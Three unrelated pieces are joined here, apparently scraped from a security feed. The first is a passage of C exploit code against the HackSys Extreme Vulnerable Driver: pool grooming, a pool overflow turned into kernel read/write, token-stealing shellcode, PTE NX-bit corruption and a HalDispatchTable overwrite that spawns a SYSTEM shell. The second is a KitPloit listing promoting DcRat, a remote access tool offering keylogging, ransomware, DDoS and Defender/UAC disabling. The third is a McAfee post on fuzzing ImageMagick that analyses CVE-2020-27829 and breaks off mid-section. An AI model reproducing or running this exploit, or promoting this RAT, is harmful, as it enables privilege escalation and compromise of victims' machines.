        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;
    }

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i <= 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;
    }

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
{
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i <= 5000; i += 2)
    {
        DeviceIoControl(
            driverHandle,
            0x0022206f,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedPoke,
            NULL
        );
    }

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
{
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
    DeviceIoControl(
        driverHandle,
        0x00222063,
        &helperObject,
        sizeof(helperObject),
        &helperObject,
        sizeof(helperObject),
        &bytesReturned2,
        NULL
    );

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;
}

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
{
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes
    fillHoles(driverHandle);

    // Groom the pool
    groomPool(driverHandle);

    // Poke holes
    pokeHoles(driverHandle);

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow
    DeviceIoControl(
        driverHandle,
        0x0022204b,
        &vulnBuffer,
        sizeof(vulnBuffer),
        &vulnBuffer,
        0x28,
        &bytesreturnedOverflow,
        NULL
    );

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i <= 5000; i++)
    {
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;

        DeviceIoControl(
            driverHandle,
            0x0022206b,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
        {
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop
            break;
        }
    }

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

    /*
        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
        _start:
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
        __loop:
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!
    */

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i <= 9; i++)
    {
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &helperobjectArray[index],
            sizeof(helperobjectArray[index]),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &mainObject,
            sizeof(mainObject),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Increase the counter
        counter++;

        // Increase the counter
        kusersharedData += 0x8;
    }

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
        GetModuleHandle(
            TEXT("ntdll.dll")),
        "NtQueryIntervalProfile"
    );

    // Error handling
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
        exit(1);
    }

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;
    NtQueryIntervalProfile(
        0x1234,
        &exploit
    );

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");
}

void main(void)
{
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    // Error handling
    if (drvHandle == (HANDLE)-1)
    {
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
    }
    else
    {
        readwritePrimitive(drvHandle);
    }
}
☑ ★ ✇ KitPloit - PenTest & Hacking Tools

DcRat - A Simple Remote Tool Written In C#

By: Zion3R


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and security
  • Server IP port can be archived through link
  • Multi-Server,multi-port support
  • Plugin system through Dll, which has strong expansibility
  • Super tiny client size (about 40~50K)
  • Data transform with msgpack (better than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build:vs2019
  • Runtime:
Project Runtime
Server .NET Framework 4.61
Client and others .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealer (only chrome and edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • ……

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the lastest release.


Attention

我(簞純)对您由使用或传播等由此软件引起的任何行为和/或损害不承担任何责任。您对使用此软件的任何行为承担全部责任,并承认此软件仅用于教育和研究目的。下载本软件或软件的源代码,您自动同意上述内容。
I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.


Thanks


☑ ★ ✇ McAfee Blogs

Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

By: Hardik Shah

Introduction:

ImageMagick is a hugely popular open source software that is used in lot of systems around the world. It is available for the Windows, Linux, MacOS platforms as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has lot of configuration options which we can see by running following command:

$./configure –help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use following commands:

$CC=afl-gcc CXX=afl=g++ CFLAGS=”-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer” LDFLAGS=”-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer” ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would be include the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting corpus is to search on Google or GitHub. We can also use existing test corpus from various software. A good test corpus is available on the  AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it will instrument each basic block so that it can trace the program execution path. It maintains a shared memory as a bitmap and it uses an algorithm to check new block hits. If a new block hit has been found, it will save this information to bitmap.

Now it may be possible that more than one input file from the corpus can trigger the same path, as we have collected sample files from various sources, we don’t have any information on what paths they will trigger at the runtime. If we use this corpus without removing such files, then we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> — magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized corpus, we can start fuzzing. To fuzz we need to use following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. In case we have multicore processors, we can run multiple instances of AFL, with one Master and n number of Slaves. Where n is the available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run master instances, we can use following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

We can run slave instances using following command:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this Fuzzing campaign, we found one crash related to an out of bound read inside a heap memory. We have reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has release a new build with version: 7.0.46 to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick with following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past allocated heap buffer and therefore ASAN caused this crash. This can atleast lead to a  ImageMagick crash on the systems running vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

  1. Image File Header (IFH) – Contains information such as file identifier, version, offset of IFD.
  2. Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like colormap, page number, BitPerSample, FillOrder,
  3. Bitmap data – Contains various image data like strips, tiles, etc.

We can tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see the following information with tiffinfo like width, height, sample per pixel, row per strip etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planer configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, program was crashing at function “PushQuantumPixel” in the following location in quantum-import.c line 256:

On checking “PushQuantumPixel” function in “MagickCore/quantum-import.c” we can see the following code at line #256 where program is crashing:

We can see following:

  • “pixels” seems to be a character array
  • inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
  • its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of “pixels” which means that value is out of bound from the allocated heap memory.

Now we need to figure out following:

  1. What is “pixels” and what data it contains?
  2. Why it is crashing?
  3. How this was fixed?

Finding root cause:

To start with, we can check “ReadTIFFImage” function in coders/tiff.c file and see that it allocates memory using a “AcquireQuantumMemory” function call, which appears as per the documentation mentioned here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case two parameters passed to this function are “extent” and “sizeof(*strip_pixels)”

We can see that “extent” is calculated as following in the code below:

There is a function TIFFStripSize(tiff) which returns size for a strip of data as mentioned in libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224 and we can also see that in the code mentioned above,  “image->columns * sizeof(uint64)” is also added to extent, which results in 24 added to extent, so extent value becomes 248.

So, this extent value of 248 and sizeof(*strip_pixels) which is 1 is passed to “AcquireQuantumMemory” function and total memory of 248 bytes get allocated.

This is how memory is allocated.

“Strip_pixel” is pointer to newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain “0xbe” which is default for newly allocated memory by ASAN:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a “memset” call and this is assigned to a variable “p”, as mentioned in below image. Please also note that “p” will be used as a pointer to traverse this memory location going forward in the program:

Later on we see that there is a call to “TIFFReadEncodedPixels” which reads strip data from TIFF file and stores it into newly allocated buffer “strip_pixels” of 248 bytes (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we need to again refer to TIFF file structure. We can see that there is a tag called “StripOffsets” and its value is 8, which specifies the offset of strip data inside TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” is the actual data from the TIFF file from offset 8. This will be traversed through pointer “p”.

Inside “ReadTIFFImage” function there are two nested for loops.

  • The first “for loop” is responsible for iterating for “samples_per_pixel” time which is 3.
  • The second “for loop” is responsible for iterating the pixel data for “image->rows” times, which is 32. This second loop will be executed for 32 times or number of rows in the image irrespective of allocated buffer size .
  • Inside this second for loop, we can see something like this:

  • We can notice that “ImportQuantumPixel” function uses the “p” pointer to read the data from “strip_pixels” and after each call to “ImportQuantumPixel”, value of “p” will be increased by “stride”.

Here “stride” is calculated by calling function “TIFFVStripSize()” function which as per documentation returns the number of bytes in a strip with nrows rows of data.  In this case it is 14. So, every time pointer “p” is incremented by “14” or “0xE” inside the second for loop.

If we print the image structure which is passed to “ImportQuantumPixels” function as parameter, we can see following:

Here we can notice that the columns value is 3, the rows value is 32 and depth is 9. If we check in the POC TIFF file, this has been taken from ImageWidth and ImageLength and BitsPerSample value:

Ultimately, control reaches to “ImportRGBQuantum” and then to the “PushQuantumPixel” function and one of the arguments to this function is the pixels data which is pointed by “p”. Remember that this points to the memory address which was previously allocated using the “AcquireQuantumMemory” function, and that its length is 248 byte and every time value of “p” is increased by 14.

The “PushQuantumPixel” function is used to read pixel data from “p” into the internal pixel data storage of ImageMagick. There is a for loop which is responsible for reading data from the provided pixels array of 248 bytes into a structure “quantum_Info”. This loop reads data from pixels incrementally and saves it in the “quantum_info->state.pixels” field.

The root cause here is that there are no proper bounds checks and the program tries to read data beyond the allocated buffer size on the heap, while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

